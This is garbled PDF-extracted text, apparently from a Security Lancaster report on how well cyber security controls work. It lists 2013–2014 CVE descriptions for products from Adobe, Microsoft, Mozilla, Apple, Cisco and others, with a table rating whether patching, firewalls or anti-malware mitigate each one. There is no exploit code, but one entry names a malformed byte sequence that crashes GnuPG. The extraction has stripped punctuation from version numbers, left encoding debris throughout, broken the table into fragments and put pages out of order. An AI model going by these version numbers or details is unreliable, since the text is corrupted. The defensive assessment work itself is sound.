CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532
CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors
CVE-2014-0562rdquoCross-site scripting (XSS) vulnerability in
Adobe Reader and Acrobat 10x before10112 and 11x before 11009 on OS Xallows remote attackers to inject arbitraryweb script or HTML via unspecified vectorsaka rdquordquoUniversal XSS (UXSS)rdquordquordquo
CVE-2014-0577rdquoAdobe Flash Player before 1300252and 14x and 15x before 1500223 onWindows and OS X and before 112202418on Linux Adobe AIR before 1500356Adobe AIR SDK before 1500356 andAdobe AIR SDK amp Compiler before1500356 allow attackers to executearbitrary code by leveraging an unspecifiedrdquordquotype confusionrdquordquo a different vulnerabilitythan CVE-2014-0584 CVE-2014-0585CVE-2014-0586 and CVE-2014-0590rdquo
CVE-2014-0765Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along GotoCmd argument
CVE-2014-0767Stack-based buffer overflow in AdvantechWebAccess before 72 allows remoteattackers to execute arbitrary code via along AccessCode argument
CVE-2014-0783Stack-based buffer overflow inBKHOdeqexe in Yokogawa CENTUMCS 3000 R30950 and earlier allows remoteattackers to execute arbitrary code via acrafted TCP packet
CVE-2014-1330WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1342WebKit as used in Apple Safari before614 and 7x before 704 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via a crafted web site adifferent vulnerability than other WebKitCVEs listed in APPLE-SA-2014-05-21-1
CVE-2014-1349Use-after-free vulnerability in Safari inApple iOS before 712 allows remoteattackers to execute arbitrary code or causea denial of service (application crash) viaan invalid URL
CVE-2014-1356Heap-based buffer overflow in launchdin Apple iOS before 712 Apple OS Xbefore 1094 and Apple TV before 612allows attackers to execute arbitrary codevia a crafted application that sends IPCmessages
CVE-2014-1370The byte-swapping implementation incopyfile in Apple OS X before 1094 allowsremote attackers to execute arbitrary codeor cause a denial of service (out-of-boundsmemory access and application crash) via acrafted AppleDouble file in a ZIP archive
CVE-2014-1379Graphics Drivers in Apple OS X before1094 allows attackers to gain privilegesor cause a denial of service (NULL pointerdereference and system crash) via a 32-bit
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 23 of 28
executable file for a crafted application
CVE-2014-1382WebKit as used in Apple iOS before712 Apple Safari before 615 and 7xbefore 705 and Apple TV before 612allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption and application crash) via acrafted web site a different vulnerabilitythan other WebKit CVEs listed in APPLE-SA-2014-06-30-1 APPLE-SA-2014-06-30-3 and APPLE-SA-2014-06-30-4
CVE-2014-1466SQL injection vulnerability in CSP MySQLUser Manager 23 allows remote attackersto execute arbitrary SQL commands via thelogin field of the login page
CVE-2014-1472Multiple cross-site scripting (XSS)vulnerabilities in the Enterprise Managerin McAfee Vulnerability Manager (MVM)755 and earlier allow remote attackers toinject arbitrary web script or HTML viaunspecified vectors
CVE-2014-1477Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before270 Firefox ESR 24x before 243Thunderbird before 243 and SeaMonkeybefore 224 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1518Multiple unspecified vulnerabilities in thebrowser engine in Mozilla Firefox before290 Firefox ESR 24x before 245Thunderbird before 245 and SeaMonkeybefore 226 allow remote attackers to causea denial of service (memory corruptionand application crash) or possibly executearbitrary code via unknown vectors
CVE-2014-1563Use-after-free vulnerability in themozillaDOMSVGLengthGetTearOfffunction in Mozilla Firefox before 320Firefox ESR 31x before 311 andThunderbird 31x before 311 allows remoteattackers to execute arbitrary code orcause a denial of service (heap memorycorruption) via an SVG animation withDOM interaction that triggers incorrectcycle collection
CVE-2014-1565The mozilladomAudioEventTimelinefunction in the Web Audio APIimplementation in Mozilla Firefox before320 Firefox ESR 31x before 311 andThunderbird 31x before 311 does notproperly create audio timelines whichallows remote attackers to obtain sensitiveinformation from process memory or causea denial of service (out-of-bounds read) viacrafted API calls
CVE-2014-1586contentbasesrcnsDocumentcpp inMozilla Firefox before 330 Firefox ESR31x before 312 and Thunderbird 31xbefore 312 does not consider whetherWebRTC video sharing is occurring whichallows remote attackers to obtain sensitiveinformation from the local camera in certainIFRAME situations by maintaining a sessionafter the user temporarily navigates away
CVE-2014-1701
The GenerateFunction function inbindingsscriptscode generator v8pmin Blink as used in Google Chrome before3301750149 does not implement acertain cross-origin restriction for theEventTargetdispatchEvent functionwhich allows remote attackers to conductUniversal XSS (UXSS) attacks via vectorsinvolving events
CVE-2014-1740Multiple use-after-free vulnerabilities innetwebsocketswebsocket jobcc in theWebSockets implementation in GoogleChrome before 3401847137 allow remoteattackers to cause a denial of service orpossibly have unspecified other impact viavectors related to WebSocketJob deletion
CVE-2014-1744Integer overflow in the AudioInputRendererHostOnCreateStream functionin contentbrowserrendererhostmediaaudio input renderer hostccin Google Chrome before 3501916114allows remote attackers to cause a denial ofservice or possibly have unspecified otherimpact via vectors that trigger a largeshared-memory allocation
CVE-2014-1753rdquoMicrosoft Internet Explorer 6 through 9allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-1806rdquoThe NET Remoting implementation inMicrosoft NET Framework 11 SP120 SP2 35 351 4 45 and451 does not properly restrict memoryaccess which allows remote attackers toexecute arbitrary code via vectors involvingmalformed objects aka rdquordquoTypeFilterLevelVulnerabilityrdquordquordquo
CVE-2014-1808rdquoMicrosoft Office 2013 Gold SP1 RTand RT SP1 allows remote attackers toobtain sensitive token information via aweb site that sends a crafted responseduring opening of an Office document akardquordquoToken Reuse Vulnerabilityrdquordquordquo
CVE-2014-1811rdquoThe TCP implementation in MicrosoftWindows Vista SP2 Windows Server2008 SP2 and R2 SP1 Windows 7 SP1Windows 8 Windows 81 Windows Server2012 Gold and R2 and Windows RTGold and 81 allows remote attackers tocause a denial of service (non-paged poolmemory consumption and system hang) viamalformed data in the Options field of aTCP header aka rdquordquoTCP Denial of ServiceVulnerabilityrdquordquordquo
CVE-2014-1812rdquoThe Group Policy implementation inMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows7 SP1 Windows 8 Windows 81 andWindows Server 2012 Gold and R2 does notproperly handle distribution of passwordswhich allows remote authenticated users toobtain sensitive credential information andconsequently gain privileges by leveragingaccess to the SYSVOL share as exploited inthe wild in May 2014 aka rdquordquoGroup PolicyPreferences Password Elevation of PrivilegeVulnerabilityrdquordquordquo
CVE-2014-2014imapsync before 1584 when running withthe ndashtls option attempts a cleartext loginwhen a certificate verification failure occurswhich allows remote attackers to obtaincredentials by sniffing the network
CVE-2014-2103Cisco Intrusion Prevention System (IPS)Software allows remote attackers to cause adenial of service (MainApp process outage)via malformed SNMP packets aka Bug IDsCSCum52355 and CSCul49309
CVE-2014-2109The TCP Input module in Cisco IOS122 through 124 and 150 through 154when NAT is used allows remote attackersto cause a denial of service (memoryconsumption or device reload) via craftedTCP packets aka Bug IDs CSCuh33843and CSCuj41494
CVE-2014-2364Multiple stack-based buffer overflows inAdvantech WebAccess before 72 allowremote attackers to execute arbitrary codevia a long string in the (1) ProjectName(2) SetParameter (3) NodeName(4) CCDParameter (5) SetColor (6)AlarmImage (7) GetParameter (8)GetColor (9) ServerResponse (10)SetBaud or (11) IPAddress parameterto an ActiveX control in (a) webvactocx(b) dvsocx or (c) webdactocx
CVE-2014-2416Unspecified vulnerability in the OracleData Integrator component in OracleFusion Middleware 111130 allows remoteattackers to affect availability via unknownvectors related to Data Quality a differentvulnerability than CVE-2014-2407 CVE-2014-2415 CVE-2014-2417 and CVE-2014-2418
CVE-2014-2554OTRS 31x before 3121 32x before3216 and 33x before 336 allows remoteattackers to conduct clickjacking attacks viaan IFRAME element
CVE-2014-2643Unspecified vulnerability in HP SystemsInsight Manager (SIM) before 74 allowsremote authenticated users to gainprivileges via unknown vectors
CVE-2014-2742rdquoIsode M-Link before 160v7 does notproperly restrict the processing ofcompressed XML elements which allowsremote attackers to cause a denial of service(resource consumption) via a crafted XMPPstream aka an rdquordquoxmppbombrdquordquo attackrdquo
CVE-2014-2768rdquoMicrosoft Internet Explorer 6 through 8allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2773rdquo
CVE-2014-2789rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2795 CVE-2014-2798 andCVE-2014-2804rdquo
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 24 of 28
CVE-2014-2791rdquoMicrosoft Internet Explorer 9 allows remoteattackers to execute arbitrary code or causea denial of service (memory corruption) viaa crafted web site aka rdquordquoInternet ExplorerMemory Corruption Vulnerabilityrdquordquordquo
CVE-2014-2794rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2788rdquo
CVE-2014-2808rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2796 CVE-2014-2825CVE-2014-4050 CVE-2014-4055 and CVE-2014-4067rdquo
CVE-2014-2821rdquoMicrosoft Internet Explorer 8 and 9 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-3444The GetGUID function in codecsdmp4dllin RealNetworks RealPlayer 160351 andearlier allows remote attackers to executearbitrary code or cause a denial of service(write access violation and applicationcrash) via a malformed 3gp file
CVE-2014-3489libutilmiq-passwordrb in Red HatCloudForms 30 Management Engine(CFME) before 5242 uses a hard-codedsalt which makes it easier for remoteattackers to guess passwords via a bruteforce attack
CVE-2014-3507Memory leak in d1 bothc in the DTLSimplementation in OpenSSL 098 before098zb 100 before 100n and 101before 101i allows remote attackersto cause a denial of service (memoryconsumption) via zero-length DTLSfragments that trigger improper handling ofthe return value of a certain insert function
CVE-2014-3556rdquoThe STARTTLS implementation inmailngx mail smtp handlerc in the SMTPproxy in nginx 15x and 16x before 161and 17x before 174 does not properlyrestrict IO buffering which allows man-in-the-middle attackers to insert commandsinto encrypted SMTP sessions by sending acleartext command that is processed afterTLS is in place related to a rdquordquoplaintextcommand injectionrdquordquo attack a similar issueto CVE-2011-0411rdquo
CVE-2014-3580The mod dav svn Apache HTTPD servermodule in Apache Subversion 1x before1719 and 18x before 1811 allows remoteattackers to cause a denial of service (NULLpointer dereference and server crash) via aREPORT request for a resource that doesnot exist
CVE-2014-3814
The Juniper Networks NetScreen Firewalldevices with ScreenOS before 63r17 whenconfigured to use the internal DNS lookupclient allows remote attackers to cause adenial of service (crash and reboot) viaa sequence of malformed packets to thedevice IP
CVE-2014-3819Juniper Junos 114 before 114R12 121before 121R10 121X44 before 121X44-D35 121X45 before 121X45-D25121X46 before 121X46-D20 121X47before 121X47-D10 122 before 122R8123 before 123R7 131 before 131R4132 before 132R4 133 before 133R2and 141 before 141R1 when Auto-RP isenabled allows remote attackers to causea denial of service (RDP routing processcrash and restart) via a malformed PIMpacket
CVE-2014-3872Multiple SQL injection vulnerabilities inthe administration login page in D-LinkDAP-1350 (Rev A1) with firmware114 and earlier allow remote attackers toexecute arbitrary SQL commands via the(1) username or (2) password
CVE-2014-4044OpenAFS 168 does not properly clear thefields in the host structure which allowsremote attackers to cause a denial of service(uninitialized memory access and crash)via unspecified vectors related to TMAYrequests
CVE-2014-4079rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090 CVE-2014-4094CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4082rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4100rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4103 CVE-2014-4104 CVE-2014-4105 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4105rdquoMicrosoft Internet Explorer 6 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memory
corruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-2799 CVE-2014-4059CVE-2014-4065 CVE-2014-4079 CVE-2014-4081 CVE-2014-4083 CVE-2014-4085 CVE-2014-4088 CVE-2014-4090CVE-2014-4094 CVE-2014-4097 CVE-2014-4100 CVE-2014-4103 CVE-2014-4104 CVE-2014-4106 CVE-2014-4107CVE-2014-4108 CVE-2014-4109 CVE-2014-4110 and CVE-2014-4111rdquo
CVE-2014-4114rdquoMicrosoft Windows Vista SP2 WindowsServer 2008 SP2 and R2 SP1 Windows 7SP1 Windows 8 Windows 81 WindowsServer 2012 Gold and R2 and WindowsRT Gold and 81 allow remote attackersto execute arbitrary code via a craftedOLE object in an Office document asexploited in the wild with a rdquordquoSandwormrdquordquoattack in June through October 2014 akardquordquoWindows OLE Remote Code ExecutionVulnerabilityrdquordquordquo
CVE-2014-4127rdquoMicrosoft Internet Explorer 6 through 10allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4130rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4132 and CVE-2014-4138rdquo
CVE-2014-4132rdquoMicrosoft Internet Explorer 11 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4130 and CVE-2014-4138rdquo
CVE-2014-4133rdquoMicrosoft Internet Explorer 6 and 7 allowsremote attackers to execute arbitrary codeor cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-4137rdquo
CVE-2014-4141rdquoMicrosoft Internet Explorer 8 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-4481Integer overflow in CoreGraphics in AppleiOS before 813 Apple OS X before10102 and Apple TV before 703 allowsremote attackers to execute arbitrary codeor cause a denial of service (applicationcrash) via a crafted PDF document
CVE-2014-4617The do uncompress function ing10compressc in GnuPG 1x before1417 and 2x before 2024 allows context-dependent attackers to cause a denialof service (infinite loop) via malformedcompressed packets as demonstrated by
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 25 of 28
an a3 01 5b ff byte sequence
CVE-2014-4631RSA Adaptive Authentication (On-Premise)6021 through 71 P3 when using devicebinding in a Challenge SOAP call orusing the RSA Adaptive AuthenticationIntegration Adapters with Out-of-BandPhone (Authentify) functionality conductspermanent device binding even whenauthentication fails which allows remoteattackers to bypass authentication
CVE-2014-5528The Appsflyer library for Android does notverify X509 certificates from SSL serverswhich allows man-in-the-middle attackersto spoof servers and obtain sensitiveinformation via a crafted certificate
CVE-2014-6040rdquoGNU C Library (aka glibc) before 220allows context-dependent attackers to causea denial of service (out-of-bounds readand crash) via a multibyte character valueof rdquordquo0xffffrdquordquo to the iconv function whenconverting (1) IBM933 (2) IBM935 (3)IBM937 (4) IBM939 or (5) IBM1364encoded data to UTF-8rdquo
CVE-2014-6105IBM Security Identity Manager 6x before6003 IF14 allows remote attackers toconduct clickjacking attacks via unspecifiedvectors
CVE-2014-6136IBM Security AppScan Standard 8x and 9xbefore 9011 FP1 supports unencryptedsessions which allows remote attackers toobtain sensitive information by sniffing thenetwork
CVE-2014-6164IBM WebSphere Application Server80x before 80010 and 85x before8554 allows remote attackers to spoofOpenID and OpenID Connect cookies andconsequently obtain sensitive informationvia a crafted URL
CVE-2014-6363rdquovbscriptdll in Microsoft VBScript 56through 58 as used with Internet Explorer6 through 11 and other products allowsremote attackers to execute arbitrarycode or cause a denial of service(memory corruption) via a crafted website aka rdquordquoVBScript Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6369rdquoMicrosoft Internet Explorer 9 through 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquordquo
CVE-2014-6378Juniper Junos 114 before R12-S4 121X44before D35 121X45 before D30 121X46before D25 121X47 before D10 122before R9 122X50 before D70 123 beforeR7 131 before R4 before S3 131X49before D55 131X50 before D30 132before R5 132X50 before D20 132X51before D26 and D30 132X52 before D15133 before R3 and 141 before R1 allowsremote attackers to cause a denial of service(router protocol daemon crash) via a craftedRSVP PATH message
CVE-2014-6487Unspecified vulnerability in the OracleIdentity Manager component in OracleFusion Middleware 11115 1111711121 and 11122 allows remoteauthenticated users to affect integrity viaunknown vectors related to End User SelfService
CVE-2014-7250The TCP stack in 43BSD Net2 as usedin FreeBSD 54 NetBSD possibly 20 andOpenBSD possibly 36 does not properlyimplement the session timer which allowsremote attackers to cause a denial of service(resource consumption) via crafted packets
CVE-2014-7927The SimplifiedLoweringDoLoadBufferfunction in compilersimplified-loweringccin Google V8 as used in Google Chromebefore 400221491 does not properlychoose an integer data type which allowsremote attackers to cause a denial ofservice (memory corruption) or possiblyhave unspecified other impact via craftedJavaScript code
CVE-2014-7945OpenJPEG before r2908 as used inPDFium in Google Chrome before400221491 allows remote attackersto cause a denial of service (out-of-boundsread) via a crafted PDF document relatedto j2kc jp2c and t2c
CVE-2014-8447Adobe Reader and Acrobat 10x before10113 and 11x before 11010 on Windows
and OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-8445 CVE-2014-8446 CVE-2014-8456CVE-2014-8458 CVE-2014-8459 CVE-2014-8461 and CVE-2014-9158
CVE-2014-8638The navigatorsendBeacon implementationin Mozilla Firefox before 350 FirefoxESR 31x before 314 Thunderbird before314 and SeaMonkey before 232 omitsthe CORS Origin header which allowsremote attackers to bypass intended CORSaccess-control checks and conduct cross-site request forgery (CSRF) attacks via acrafted web site
CVE-2014-8835rdquoThe xpc data get bytes function in libxpcin Apple OS X before 10102 does not verifythat a dictionaryrsquos Attributes key has thexpc data data type which allows attackersto execute arbitrary code by providing acrafted dictionary to sysmond related toan rdquordquoXPC type confusionrdquordquo issuerdquo
CVE-2014-9159Heap-based buffer overflow in AdobeReader and Acrobat 10x before 10113and 11x before 11010 on Windows andOS X allows attackers to execute arbitrarycode via unspecified vectors a differentvulnerability than CVE-2014-8457 and CVE-2014-8460
CVE-2014-9163Stack-based buffer overflow in Adobe FlashPlayer before 1300259 and 14x and 15xbefore 1500246 on Windows and OS Xand before 112202425 on Linux allowsattackers to execute arbitrary code viaunspecified vectors as exploited in the wildin December 2014
CVE-2014-9350rdquoTP-Link TL-WR740N 4 with firmware3170 Build 140520 3166 Build 130529and 3164 Build 130205 allows remoteattackers to cause a denial of service(httpd crash) via vectors involving ardquordquonewrdquordquo value in the isNew parameter toPingIframeRpmhtmrdquo
CVE-2014-9357Docker 132 allows remote attackers toexecute arbitrary code with root privilegesvia a crafted (1) image or (2) build in aDockerfile in an LZMA (xz) archive relatedto the chroot for archive extraction
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 26 of 28
Survey Responses
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 27 of 28
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 28 of 28
CV
ES
ME
1S
ME
2S
ME
3S
ME
4Id
ealis
edN
oC
EW
ith
CE
CV
E-2
01
4-4
14
1y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-44
81
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
CV
E-2
01
4-4
61
7y
yn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-4
63
1n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
Sec
ure
Co
nfi
gu
rati
on
CV
E-2
01
4-6
04
0n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-6
10
5n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
13
6n
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Sec
ure
Co
nfi
gu
rati
on
P
atch
Man
agem
ent
CV
E-2
01
4-6
36
3y
ny
yn
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
69
yn
yy
No
tM
itig
ated
Mit
igat
ed-
Web
site
Bla
cklis
tin
g
Sec
ure
Co
nfi
gu
rati
on
(Sec
ure
Bro
wse
r)
Pat
chM
anag
emen
tC
VE
-20
14
-63
78
nn
nn
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-6
48
7n
ny
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-7
25
0n
yy
nn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lP
atch
Man
agem
ent
CV
E-2
01
4-7
92
7y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lS
ecu
reC
on
fig
ura
tio
n(A
cces
sC
on
tro
l)
Pat
chM
anag
emen
tC
VE
-20
14
-79
45
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
Pat
chM
anag
emen
tC
VE
-20
14
-84
47
yy
yy
nN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
tC
VE
-20
14
-86
38
yy
yy
yN
ot
Mit
igat
edM
itig
ated
-W
ebsi
teB
lack
listi
ng
S
ecu
reC
on
fig
ura
tio
n(S
ecu
reB
row
ser)
P
atch
Man
agem
ent
CV
E-2
01
4-8
83
5y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
CV
E-2
01
4-9
15
9y
yy
yy
No
tM
itig
ated
Par
tial
lyM
itig
ated
-A
nti
-Mal
war
eP
atch
Man
agem
ent
[Tim
eD
elay
]C
VE
-20
14
-91
63
yy
yy
yN
ot
Mit
igat
edP
arti
ally
Mit
igat
ed-
An
ti-M
alw
are
Pat
chM
anag
emen
t[T
ime
Del
ay]
CV
E-2
01
4-9
35
0y
yy
yn
No
tM
itig
ated
Mit
igat
ed-
Fir
ewal
lA
nti
-Do
sF
irm
war
eU
pd
ates
CV
E-2
01
4-9
35
7n
nn
nn
No
tM
itig
ated
Par
tial
lyM
itig
ated
-P
atch
Man
agem
ent
An
ti-M
alw
are
Sec
ure
Co
nfi
gu
rati
on
CYBER SECURITY CONTROLS EFFECTIVENESSmdash Security Lancaster Page 18 of 28
CVE DetailsCVE-2013-0008
rdquowin32ksys in the kernel-mode driversin Microsoft Windows Vista SP2 x000DWindows Server 2008 SP2 R2 and R2 SP1Windows 7 Gold and SP1 x000D Windows8 Windows Server 2012 and Windows RTdoes not properly x000D handle windowbroadcast messages which allows localusers to gain x000D privileges via acrafted application aka rdquordquoWin32k ImproperMessage x000D Handling Vulnerabilityrdquordquordquo
CVE-2013-0022rdquoUse-after-free vulnerability in MicrosoftInternet Explorer 9 allows x000D remoteattackers to execute arbitrary code viaa crafted web site that x000D triggersaccess to a deleted object aka rdquordquoInternetExplorer x000D LsGetTrailInfo Use AfterFree Vulnerabilityrdquordquordquo
CVE-2013-0084rdquoDirectory traversal vulnerability inMicrosoft SharePoint Server 2010 x000DSP1 and SharePoint Foundation 2010 SP1allows remote attackers to x000D bypassintended read restrictions for contentand hijack user x000D accounts via acrafted URL aka rdquordquoSharePoint DirectoryTraversal x000D Vulnerabilityrdquordquordquo
CVE-2013-0140SQL injection vulnerability in the Agent-Handler component in McAfee x000DePolicy Orchestrator (ePO) before 457and 46x before 466 allows x000Dremote attackers to execute arbitrary SQLcommands via a crafted x000D requestover the Agent-Server communicationchannel
CVE-2013-0149The OSPF implementation in Cisco IOS120 through 124 and 150 x000D through153 IOS-XE 2x through 39xS ASA andPIX 7x through 91 x000D FWSMNX-OS and StarOS before 14050488does not properly validate x000D LinkState Advertisement (LSA) type 1 packetsbefore performing x000D operations onthe LSA database which allows remoteattackers to cause x000D a denial ofservice (routing disruption) or obtainsensitive packet x000D information viaa (1) unicast or (2) multicast packetaka Bug IDs x000D CSCug34485CSCug34469 CSCug39762 CSCug63304and CSCug39795
CVE-2013-0172Samba 40x before 401 in certainActive Directory x000D domain-controllerconfigurations does not properly interpretAccess x000D Control Entries that arebased on an objectClass which allowsremote x000D authenticated users tobypass intended restrictions on modifyingLDAP x000D directory objects byleveraging (1) objectClass access by auser (2) x000D objectClass access by agroup or (3) write access to an attribute
CVE-2013-0174The external node classifier (ENC) APIin Foreman before 11 allows x000Dremote attackers to obtain the hashed rootpassword via an API x000D request
CVE-2013-0199The default LDAP ACIs in FreeIPA30 before 312 do not restrict x000Daccess to the (1) ipaNTTrustAuthIncomingand (2) x000D ipaNTTrustAuthOutgoingattributes which allow remote attackersto x000D obtain the Cross-Realm KerberosTrust key via unspecified vectors
CVE-2013-0253The default configuration of Apache Maven304 when using Maven x000D Wagon21 disables SSL certificate checks whichallows remote x000D attackers to spoofservers via a man-in-the-middle (MITM)attack
CVE-2013-0270OpenStack Keystone Grizzly before 20131Folsom and possibly earlier x000D allowsremote attackers to cause a denial of service(CPU and memory x000D consumption)via a large HTTP request as demonstratedby a long x000D tenant name whenrequesting a token
CVE-2013-0481The console in IBM Sterling B2B Integrator51 and 52 and Sterling File Gateway 21and 22 allows remote attackers to readstack traces by triggering (1) an error or(2) an exception
CVE-2013-0598Cross-site request forgery (CSRF)vulnerability in the Web Client in x000DIBM Rational ClearQuest 71 before71212 80 before 8008 and x000D801 before 8011 allows remote attackersto hijack the x000D authentication ofarbitrary users
CVE-2013-0619Adobe Reader and Acrobat 9x before 95310x before 1015 and x000D 11x before1101 allow attackers to execute arbitrarycode or cause x000D a denial of service(memory corruption) via unspecified vectorsa x000D different vulnerability than CVE-2012-1530 CVE-2013-0601 x000D CVE-2013-0605 CVE-2013-0616 CVE-2013-0620 and CVE-2013-0623
CVE-2013-0633Buffer overflow in Adobe Flash Playerbefore 10318351 and 11x before115502149 on Windows and Mac OSX before 10318351 and 11x before112202262 on Linux before 11111132on Android 2x and 3x and before11111537 on Android 4x allows remoteattackers to execute arbitrary code viacrafted SWF content as exploited in thewild in February 2013
CVE-2013-0649Use-after-free vulnerability in AdobeFlash Player before 10318363 and 11xbefore 116602168 on Windows before10318361 and 11x before 116602167on Mac OS X before 10318361 and11x before 112202270 on Linux before11111143 on Android 2x and 3x andbefore 11111547 on Android 4x AdobeAIR before 360597 and Adobe AIR SDKbefore 360599 allows attackers to executearbitrary code via unspecified vectors adifferent vulnerability than CVE-2013-0644
and CVE-2013-1374
